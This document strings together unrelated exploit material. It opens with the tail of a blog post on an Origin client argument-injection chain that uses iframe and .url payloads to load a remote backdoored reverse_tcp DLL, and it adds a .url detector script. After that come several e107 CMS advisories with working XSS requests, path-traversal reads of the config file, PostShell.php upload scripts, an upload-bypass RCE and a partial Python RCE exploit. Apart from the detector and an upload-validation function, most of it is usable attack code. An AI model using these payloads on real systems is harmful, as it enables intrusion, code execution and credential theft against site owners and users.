As you can see in the image above, the window icons are now loading in reverse. I failed to mention this earlier: "-reverse" is a Qt-specific argument. Origin is written mainly using the Qt framework, which is what enticed me into trying these arguments.

If we take a look at the process using Process Explorer, we see the following:

[![](https://zeropwn.github.io/assets/origin_reverse_poc.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_reverse_poc.png)

This clearly demonstrates the argument injection.

# 0x04 Arbitrary Code Execution

Now how on earth are we supposed to get code execution from this? For us to see what options we have available, we need to know what other arguments we can use. We'll stick to the Qt specific arguments before poking around Origin's own arguments.

After consulting the Qt documentation [https://doc.qt.io/qt-5/qguiapplication.html](https://doc.qt.io/qt-5/qguiapplication.html), we find out that we can use the following arguments on ANY Qt program.

```
-platform
-platformpluginpath
-platformtheme
-plugin
-qmljsdebugger
-qwindowgeometry
-qwindowicon
-qwindowtitle
-reverse
-session
-display
-geometry
```

One of the more promising ones was "platformpluginpath". This flag allows you to specify a path to load Qt plugins from. These Qt plugins (DLLs) are then loaded into Origin and executed.

We can exploit this behavior and load plugins remotely if we supply the platformpluginpath argument with a Windows share. 

Qt gives us a table of Qt plugins along with their respective directories. The QGuiApplication will automatically load valid DLLs that are a child of any of the following directories, when given the platformpluginpath argument.

Base Class | Directory | Qt Module
-----------|-----------|-----------
QAccessibleBridgePlugin|accessiblebridge| Qt GUI
QImageIOPlugin|imageformats| Qt GUI
QPictureFormatPlugin|pictureformats| Qt GUI
QAudioSystemPlugin|audio| Qt Multimedia
QDeclarativeVideoBackendFactoryInterface|video/declarativevideobackend|Qt Multimedia
QGstBufferPoolPlugin|video/bufferpool|Qt Multimedia
QMediaPlaylistIOPlugin|playlistformats|Qt Multimedia
QMediaResourcePolicyPlugin|resourcepolicy|Qt Multimedia
QMediaServiceProviderPlugin|mediaservice|Qt Multimedia
QSGVideoNodeFactoryPlugin|video/videonode|Qt Multimedia
QBearerEnginePlugin|bearer|Qt Network
QPlatformInputContextPlugin|platforminputcontexts|Qt Platform Abstraction
QPlatformIntegrationPlugin|platforms|Qt Platform Abstraction
QPlatformThemePlugin|platformthemes|Qt Platform Abstraction
QGeoPositionInfoSourceFactory|position|Qt Positioning
QPlatformPrinterSupportPlugin|printsupport|Qt Print Support
QSGContextPlugin|scenegraph| Qt Quick
QScriptExtensionPlugin|script| Qt Script
QSensorGesturePluginInterface|sensorgestures| Qt Sensors
QSensorPluginInterface|sensors| Qt Sensors
QSqlDriverPlugin|sqldrivers| Qt SQL
QIconEnginePlugin|iconengines| Qt SVG
QAccessiblePlugin|accessible| Qt Widgets
QStylePlugin|styles| Qt Widgets


Because Origin uses the QtWebEngine and works with image files (jpg, gif, bmp, etc), it requires a few Qt plugins. If we take a look in Origin's install path, we'll see an "imageformats" directory, which is populated by a number of DLLs.

[![](https://zeropwn.github.io/assets/imageformats_plugins.png "Origin Arginj")](https://zeropwn.github.io/assets/imageformats_plugins.png)

Since we know for sure that Origin works with those DLLs, we can take one of them and use it as a template for our reverse_tcp.

Before we move forward however, let's just make sure that we can reach a remote destination via the platformpluginpath flag.

[![](https://zeropwn.github.io/assets/origin_remote_plugin.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_remote_plugin.png)

Looks good to me.

## Creating the Backdoored Plugin

As I mentioned earlier, since we have a few DLLs that we know for sure Origin uses, we can use them as templates for an msfvenom payload. The following image demonstrates the creation of a reverse_tcp by first using a DLL file as a template. Qt is pretty picky about what plugins get loaded into memory, which is why I decided to use a template. However, for future reference, all it requires is a valid `.qtmetad` section.


[![](https://zeropwn.github.io/assets/create_payload.png "Origin Arginj")](https://zeropwn.github.io/assets/create_payload.png)

Now that we've created our backdoored plugin, all we have to do is host a Windows share where we can remotely download it from.

This Windows share must have one of the directories from the table within it, otherwise it won't properly load the DLL. Since we're using imageformats... well, we'll use imageformats.

[![](https://zeropwn.github.io/assets/remote_share.png "Origin Arginj")](https://zeropwn.github.io/assets/remote_share.png)

Where imageformats is hosting our backdoored plugin "FILE1337.dll"

## Finalizing the Payload

Obviously, this isn't complete yet. We have "arguably" arbitrary code execution, but not remote yet as we have no way to get a user to actually launch our crafted URI. This is where the iframe comes in.

```
<iframe src='origin://?" -platformpluginpath \\NOTDANGEROUS "'>
```

We can host this iframe wherever we want, our target just needs to open it on an outdated browser. If you try the following on Firefox, the process getting spawned looks like this:

[![](https://zeropwn.github.io/assets/opened_from_firefox.png "Origin Arginj")](https://zeropwn.github.io/assets/opened_from_firefox.png)

Clearly this defeats the argument injection, which is what I mentioned earlier. This makes exploiting the Origin vulnerability much more difficult.

Unless we can find a way to launch the process without encoding the special characters on an updated system... this exploit may not pose as big a threat.

Anyways, like before, let's just make sure everything works on Internet Explorer before we get ahead of ourselves.

<iframe width="780" height="550" src="https://www.youtube.com/embed/E9vCx9KsF3c" frameborder="0" allow="accelerometer; autoplay; encrypted-media; gyroscope; picture-in-picture" allowfullscreen></iframe>

# 0x05 An Issue With .URL Files

Seeing as modern browsers seem to protect against injecting arguments into custom URIs, I decided to look into Windows shortcuts. Interestingly enough, shortcut files do not encode special characters, which is an issue on its own. Would Microsoft consider this an issue? Hard to say. If they do, you saw it here first lol.

Anyways, a .url file typically looks like this:

```
[InternetShortcut]
URL=https://www.google.com
```

If you click that file, it will open Google in your default browser. However, if we supply it a custom URI, it will launch using said URI. On top of that... we can inject arguments, because of the lack of sanitization. This could be used to exploit a number of applications... not just Origin.

You can use the following .URL file on a fully updated Windows 10 to inject arguments into the Origin process. Let's check it out.

```
[InternetShortcut]
URL=origin://?" -reverse "
```

[![](https://zeropwn.github.io/assets/origin_win10.png "Origin Arginj")](https://zeropwn.github.io/assets/origin_win10.png)

The Origin icon you're seeing in the background is the shortcut itself. It is nearly impossible to tell it apart from a legitimate Origin.exe shortcut.

Clearly this attack vector would require some social engineering. .URL files aren't considered dangerous by most browsers. For example, Edge will ask you if you want to open the file, it'll smart-scan it, pass the scan, and launch the process with the injected arguments. 

If you were to convince someone to open a specially crafted .url file, you could leverage code execution and infect someone via the custom URI scheme Origin has implemented.
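Because `.url` files are plain INI text, the property that makes them dangerous here (a `URL=` line with a non-web scheme and unencoded quotes or spaces) is also trivial to detect at a mail gateway or in an endpoint scan. The following is an added example, not part of the post: it parses the `[InternetShortcut]` section and reports why a shortcut looks suspicious. The two samples are the post's own `.url` files; the allow-list of `http`/`https` and the wording of the findings are my choices.

```python
from typing import List, Optional
from urllib.parse import urlsplit

# The two .url files shown in the post.
SHORTCUT_BENIGN = "[InternetShortcut]\nURL=https://www.google.com\n"
SHORTCUT_SUSPECT = '[InternetShortcut]\nURL=origin://?" -reverse "\n'

# Schemes a shortcut is expected to carry (an assumption of this example).
WEB_SCHEMES = {"http", "https"}


def internet_shortcut_url(text: str) -> Optional[str]:
    """Return the URL= value from the [InternetShortcut] section, or None.
    Hand-rolled rather than configparser so that quotes, '%' and other
    characters in the value are kept exactly as written."""
    section = None
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith((";", "#")):
            continue
        if line.startswith("[") and line.endswith("]"):
            section = line[1:-1].strip().lower()
            continue
        if section == "internetshortcut" and "=" in line:
            key, _, value = line.partition("=")
            if key.strip().lower() == "url":
                return value.strip()
    return None


def shortcut_findings(text: str) -> List[str]:
    """Reasons a .url file deserves a closer look; an empty list means none."""
    url = internet_shortcut_url(text)
    if url is None:
        return ["no URL= entry in [InternetShortcut]"]
    findings: List[str] = []
    scheme = urlsplit(url).scheme.lower()
    if scheme not in WEB_SCHEMES:
        findings.append(f"non-web scheme: {scheme or '(none)'}")
    if '"' in url:
        findings.append("double quote in URL")
    if any(ch.isspace() for ch in url):
        findings.append("whitespace in URL")
    return findings


if __name__ == "__main__":
    for label, sample in (("benign", SHORTCUT_BENIGN), ("suspect", SHORTCUT_SUSPECT)):
        print(f"{label}: {shortcut_findings(sample) or 'clean'}")
```

A custom scheme on its own is not proof of anything, since plenty of legitimate shortcuts launch registered applications; the combination with a raw `"` or whitespace, neither of which belongs in a well-formed URL, is the part that indicates argument injection rather than a normal link.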


# 0x06 Tying It All Together

Having gotten this far, you may have a couple of questions. One of them may be: what if the Origin process is already running? How will the arguments get injected then?

That's where some of Origin's built-in command-line options will come in handy. There are a number of arguments that Origin accepts that we can use maliciously. So, let's say Origin's already running. In our payload, simply add the following argument:

```
origin://?" -Origin_MultipleInstances "
```

If there's another Origin process running, it'll spawn a brand new one with the arguments we supplied.

Now, let's also assume that someone installed Origin months ago and hasn't touched it since. Whenever Origin starts, it automatically checks for updates before doing anything else, which means that if Origin were to push out a patch, your client would update before the payload was even executed.

If we feed Origin the following argument, we can jump over the entire update check.

```
origin://?" /noUpdate "
```

Another thing we can do... is let Origin run in the background without bringing any attention to the process. Combine all of that along with the remote plugin preload and you've got a pretty fun exploit.

```
origin://?" /StartClientMinimized /noUpdate -Origin_MultipleInstances "
```


# References
* [https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62](https://medium.com/0xcc/electrons-bug-shellexecute-to-blame-cacb433d0d62)
* [https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739](https://www.thezdi.com/blog/2019/4/3/loading-up-a-pair-of-qt-bugs-detailing-cve-2019-1636-and-cve-2019-6739)
* [https://proofofcalc.com/cve-2019-6453-mIRC](https://proofofcalc.com/cve-2019-6453-mIRC)
* [https://doc.qt.io/qt-5/qguiapplication.html](https://doc.qt.io/qt-5/qguiapplication.html)
            
source: https://www.securityfocus.com/bid/47697/info

E2 Photo Gallery is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.

An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This can allow the attacker to steal cookie-based authentication credentials and launch other attacks.

http://www.example.com/uploader/index.php/[xss] 
            
# Exploit Title: e107 v2.3.2 - Reflected XSS
# Date: 11/05/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: hub.woj12345@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.2
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - unauthorized

URL: http://127.0.0.1/e107/e107_plugins/tinymce4/plugins/e107/parser.php
Parameters: content

# POC
Request:
POST /e107/e107_plugins/tinymce4/plugins/e107/parser.php HTTP/1.1
Host: 127.0.0.1
Content-Length: 1126
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
Accept: text/html, */*; q=0.01
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
sec-ch-ua-mobile: ?0
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
sec-ch-ua-platform: "Windows"
Origin: http://127.0.0.1
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: cors
Sec-Fetch-Dest: empty
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Connection: close

content=%5Bhtml%5D%3Cp%3E%3Cstrong%3ELore"/><script>alert(1)</script>bb&mode=tohtml

Response:
HTTP/1.1 200 OK
Date: Thu, 11 May 2023 19:38:45 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: PHP/7.4.29
Set-Cookie: PHPSESSID=c4mphnf1igb7lbibn4q1eni10h; expires=Fri, 12-May-2023 19:38:45 GMT; Max-Age=86400; path=/e107/; HttpOnly
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 1053
Connection: close
Content-Type: text/html; charset=UTF-8

<!-- bbcode-html-start --><p><strong>Lore"/><script>alert(1)</script>bb

### XSS Reflected - Authorized

URL: http://127.0.0.1/e107/e107_admin/image.php
Parameters: for

# POC 1
Request:
GET /e107/e107_admin/image.php?mode=main&action=dialog&for=_commonh5it1%2522%253e%253cimg%2520src%253da%2520onerror%253dalert%25281%2529%253edezaw&tagid=media-cat-image&iframe=1&w=206&image=1 HTTP/1.1
Host: 127.0.0.1
Accept-Encoding: gzip, deflate
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Connection: close

Response:
HTTP/1.1 200 OK
Date: Thu, 04 May 2023 03:07:35 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "37f107dbe6a998ecf7b71689627c2a56"
Content-Length: 12420
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<div id="uploader" data-max-size="2mb" rel="/e107/e107_web/js/plupload/upload.php?for=_commonh5it1"><img src=a onerror=alert(1)>dezaw&path=">
	        <p>No HTML5 support.</p>
		</div>
[...]

# POC 2

URL: http://127.0.0.1/e107/e107_admin/newspost.php
Parameters: Payload in URL

Request:
GET /e107/e107_admin/newspost.php/sdd4h"><script>alert(1)</script>kzb89?mode=main&action=list HTTP/1.1
Host: 127.0.0.1
Cache-Control: max-age=0
sec-ch-ua: "Not?A_Brand";v="8", "Chromium";v="108"
sec-ch-ua-mobile: ?0
sec-ch-ua-platform: "Windows"
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.5359.125 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: http://127.0.0.1/e107/e107_admin/newspost.php?mode=main&action=edit&id=3
Accept-Encoding: gzip, deflate
Accept-Language: pl-PL,pl;q=0.9,en-US;q=0.8,en;q=0.7
Cookie: PHPSESSID=ftq2gnr1kgjqhfa3u902thraa8
Connection: close

Response:
HTTP/1.1 200 OK
Date: Fri, 05 May 2023 06:21:53 GMT
Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "d127dd6a44a22e093fed60b83bf36af2"
Content-Length: 72914
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>News - List - Admin Area :: hacked">bbbbb</title>
<meta charset='utf-8' />
<meta name="viewport" content="width=device-width, initial-scale=0.8, maximum-scale=1" />
<!-- *CSS* -->
[...]
<a class="btn btn-default btn-secondary nextprev-item next " href="http://127.0.0.1/e107/e107_admin/newspost.php/sdd4h">
<script>alert(1)</script>kzb89/?mode=main&action=list&from=10" title="Go to the next page" ><i class="fa fa-forward"></i></a>
[...]
            
source: https://www.securityfocus.com/bid/54096/info

The Image Gallery Plugin for e107 is prone to a remote file-disclosure vulnerability because it fails to properly sanitize user-supplied input.

An attacker can exploit this vulnerability to view local files in the context of the web server process, which may aid in further attacks.

Image Gallery 0.9.7.1 is vulnerable; other versions may also be affected. 

http://www.example.com/e107_plugins/image_gallery/viewImage.php?name=../../../../e107_config.php&type=album 
            
source: https://www.securityfocus.com/bid/54091/info

The Hupsi_fancybox Plugin for e107 is prone to a vulnerability that lets attackers upload arbitrary files. The issue occurs because the application fails to adequately sanitize user-supplied input.

An attacker can exploit this vulnerability to upload arbitrary code and execute it in the context of the web server process. This may facilitate unauthorized access or privilege escalation; other attacks are also possible.

Hupsi_fancybox 1.0.4 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$uploadfile="lo.php";

$ch = curl_init("http://www.example.com/e107/e107_plugins/hupsi_fancybox/uploader/uploadify.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('Filedata' => "@$uploadfile",
          'username' => 'test',
          'folder'   => '/e107/e107_plugins/hupsi_fancybox/uploader/'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>
            
source: https://www.securityfocus.com/bid/54098/info

The FileDownload Plugin for e107 is prone to an arbitrary file-upload vulnerability and a remote file-disclosure vulnerability because the application fails to adequately sanitize user-supplied input.

An attacker can exploit these issues to upload a file and view local files in the context of the web server process, which may aid in further attacks.

FileDownload 1.1 is vulnerable; other versions may also be affected. 

PostShell.php
<?php

$ch = curl_init("http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/save.php");
curl_setopt($ch, CURLOPT_POST, true);   
curl_setopt($ch, CURLOPT_POSTFIELDS,
    array('filename' => 'lo.php',
          'accesses' => '<?php phpinfo(); ?>'));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
   
print "$postResult";

?>

http://www.example.com/e107/e107_plugins/filedownload/filedownload/file_info/admin/edit.php?file=../../../../../e107_config.php%00 
            
# Exploit Title: e107 CMS v3.2.1 - Multiple Vulnerabilities
# Date: 30/04/2022
# Exploit Author: Hubert Wojciechowski
# Contact Author: snup.php@gmail.com
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 3.2.1
# Tested on: Windows 10 using XAMPP, Apache/2.4.48 (Win64) OpenSSL/1.1.1l PHP/7.4.23

### XSS Reflected - Via adding comment (Authenticated)

# POC
Request:
GET /e107/news.php/fnzi4'onchange='alert(1)'?extend.1 HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Connection: close
Cookie: e107_tzOffset=-60; PHPSESSID=2ju9huul2lsl7565jpre0f2g40

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 08:02:42 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "71d7966eaa95fd8ac14da8baf3e0785d"
Content-Length: 25059
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]
<div class='media' >
<form id='e-comment-form' method='post' action='/e107/news.php/fnzi4'onchange='alert(1)'?extend.1'  >
[...]

The user clicks to comment on a news item, types any character in the comment field, and then clicks elsewhere outside the field (which fires the injected onchange handler).

image.png


### Upload restriction bypass (Authenticated [Admin]) + Stored XSS

An account with administrative privileges can bypass the image upload restriction (stored XSS via an .svg file):
image->media manager->upload a file->Image/File URL
The admin can upload an SVG from a remote location, here http://127.0.0.1:8070/xxe_svg2.svg

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 90
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=dialog&for=page^&tagid=&iframe=1&bbcode=img
Cookie: e107_tzOffset=-60; PHPSESSID=t656bpkef7ndqm0p8j9ddf9atl
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: iframe
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fxxe_svg2.svg&upload_remote_url=1&upload_caption=

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 02:06:14 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "06ed5ef56b0f736995112cafd77e9ec0"
Content-Length: 20878
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]
<div class='well clearfix media-carousel-item-container'>
<a data-toggle='context' data-bs-toggle='context' class='e-media-select  '  data-id='' data-width='0' data-height='0' data-src='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg' data-type='image' data-bbcode='img' data-target='' data-path='{e_MEDIA_IMAGE}2021-12/xxe_svg2.svg' data-preview='/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg'  data-preview-html='PGltZyBjbGFzcz0iaW1nLXJlc3BvbnNpdmUgaW1nLWZsdWlkIiBzcmM9Ii9lMTA3L2UxMDdfbWVkaWEvNDE2ZjQ2MDJlMy9pbWFnZXMvMjAyMS0xMi94eGVfc3ZnLnN2ZyIgYWx0PSJ4eGVfc3ZnLnN2ZyIgc3Jjc2V0PSIvZTEwNy9lMTA3X21lZGlhLzQxNmY0NjAyZTMvaW1hZ2VzLzIwMjEtMTIveHhlX3N2Zy5zdmcgMngiIHdpZHRoPSIyMTAiIGhlaWdodD0iMTQwIiAgLz4=' title="xxe_svg2.svg ()" style='' href='#' ><span><img class="img-responsive img-fluid" alt="" src="/e107/e107_media/416f4602e3/images/2021-12/xxe_svg2.svg" style="display:inline-block" /></span>
</a>
[...]

image.png


### Upload restriction bypass (Authenticated [Admin]) + RCE

Upload and execute a .php file.
The attacker must upload the file to ../../../ (the parent directory), because, for an undetermined reason, the application only executes the uploaded PHP code when it is placed in the parent directory.

image.png


Media Manager-> Media Upload/Import -> From a remote location

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Fcmd.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:02:08 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8

<!doctype html>
<html lang="en">
<head>
<title>Media Manager - Admin Area :: trrrrrrrrrrrrrrrr
[...]

The uploaded PHP file can be seen on the server side.

image.png


cmd.php file source:

<?php
system('whoami');
?>

image.png


### Upload restriction bypass (Authenticated [Admin]) + Server file overwrite

An attacker can overwrite, for example, the top.php file in the main directory of the web application.
Original top.php file on the server:
image.png


The file can be overwritten via the following upload functionality:
Media Manager-> Media Upload/Import -> From a remote location

# POC

Request:
POST /e107/e107_admin/image.php?mode=main&action=import HTTP/1.1
Host: 127.0.0.1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 109
Origin: http://127.0.0.1
Connection: close
Referer: http://127.0.0.1/e107/e107_admin/image.php?mode=main&action=import
Cookie: e107_tzOffset=-60; PHPSESSID=9ngnt3lteu7133g74qb9nu3jtu
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1

upload_url=http%3A%2F%2F127.0.0.1%3A8070%2Fcmd2.php&upload_remote_url=1&upload_caption=..%2F..%2F..%2Ftop.php

Response:
HTTP/1.1 200 OK
Date: Tue, 14 Dec 2021 09:20:10 GMT
Server: Apache/2.4.51 (Win64) OpenSSL/1.1.1l PHP/8.0.11
X-Powered-By: e107
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
ETag: "5b9621fc78893e36034b14f841f840f8"
Content-Length: 26075
Vary: Accept-Encoding
X-Frame-Options: SAMEORIGIN
Connection: close
Content-Type: text/html; charset=utf-8
[...]

The top.php file content has been tampered with:
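The three upload findings above share one root cause: the remote import treats `upload_caption` (and the fetched file name) as a path and does not re-check what was fetched. The check below is added here as an illustration and is not e107's own patch; `$mediaDir`, the raster-only allowlist and the `MediaImportError` class are assumptions. It refuses path separators and traversal (the `../../../cmd.php` and `../../../top.php` cases), SVG and every non-image extension (the stored-XSS and RCE cases), content that does not match the extension, and overwriting an existing file.

```php
<?php
declare(strict_types=1);

final class MediaImportError extends RuntimeException {}

// Decide where (and whether) a remotely imported file may be stored.
// $mediaDir: the only directory uploads may land in (assumed path).
// $caption:  the user-supplied upload_caption value; the caller passes the
//            basename of the remote URL when the caption is empty.
// $tmpFile:  the already-downloaded body, still outside the web root.
function media_import_target(string $mediaDir, string $caption, string $tmpFile): string
{
    // Raster images only: no SVG (scriptable), no PHP/HTML/.htaccess.
    static $allowed = [
        'jpg' => 'image/jpeg', 'jpeg' => 'image/jpeg',
        'png' => 'image/png',  'gif'  => 'image/gif', 'webp' => 'image/webp',
    ];

    // 1. The caption is a display name, never a path: keep only the last
    //    segment and refuse anything that still carries traversal or odd bytes.
    $clean = trim($caption);
    $name  = basename(str_replace('\\', '/', $clean));
    if ($name === '' || $name !== $clean || str_contains($name, '..')
        || !preg_match('/^[A-Za-z0-9][A-Za-z0-9._-]{0,99}$/', $name)) {
        throw new MediaImportError('invalid file name');
    }

    // 2. Extension allowlist, checked on the last extension only.
    $ext = strtolower(pathinfo($name, PATHINFO_EXTENSION));
    if (!isset($allowed[$ext])) {
        throw new MediaImportError("extension .$ext not allowed");
    }

    // 3. Content check: the bytes must really be that image type.
    $info = @getimagesize($tmpFile);
    if ($info === false || $info['mime'] !== $allowed[$ext]) {
        throw new MediaImportError('content does not match extension');
    }

    // 4. Resolve the final path and prove it stays inside $mediaDir.
    $base = realpath($mediaDir);
    if ($base === false) {
        throw new MediaImportError('media directory missing');
    }
    $target = $base . DIRECTORY_SEPARATOR . $name;
    if (dirname($target) !== $base) {
        throw new MediaImportError('path escapes media directory');
    }

    // 5. Never clobber an existing file (the top.php overwrite case); the
    //    caller picks a fresh name instead if it wants to keep the original.
    if (file_exists($target)) {
        throw new MediaImportError('file already exists');
    }
    return $target;
}

// Constructed self-check with the advisory's three caption values plus one
// benign name; the media directory and temp file paths are placeholders.
foreach (['xxe_svg2.svg', '../../../cmd.php', '../../../top.php', 'photo.png'] as $cap) {
    try {
        echo media_import_target('/var/www/e107/e107_media/images', $cap, '/tmp/download.bin'), "\n";
    } catch (MediaImportError $e) {
        echo "$cap rejected: {$e->getMessage()}\n";
    }
}
```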
            
# Exploit Title: e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)
# Date: 21-09-2021
# Exploit Author: Halit AKAYDIN (hLtAkydn)
# Vendor Homepage: https://e107.org/
# Software Link: https://e107.org/download
# Version: 2.3.0
# Category: Webapps
# Tested on: Linux/Windows

# e107 is a free website content management system
# It includes an endpoint that allows remote access.
# The theme page is misconfigured, causing a security vulnerability.
# Credentials of a user with sufficient permissions are required.
# The contents of the upload "malicious.zip" file must be too long to read to bypass some security measures!

# Example: python3 exploit.py -u http://example.com -l admin -p Admin123
#		   python3 exploit.py -h


from time import sleep
import requests
import argparse


def main():
	parser = argparse.ArgumentParser(
		description='e107 CMS 2.3.0 - Remote Code Execution (RCE) (Authenticated)'
	)
	parser.add_argument('-u', '--host', type=str, required=True)
	parser.add_argument('-l', '--login', type=str, required=True)
	parser.add_argument('-p', '--password', type=str, required=True)
	args = parser.parse_args()
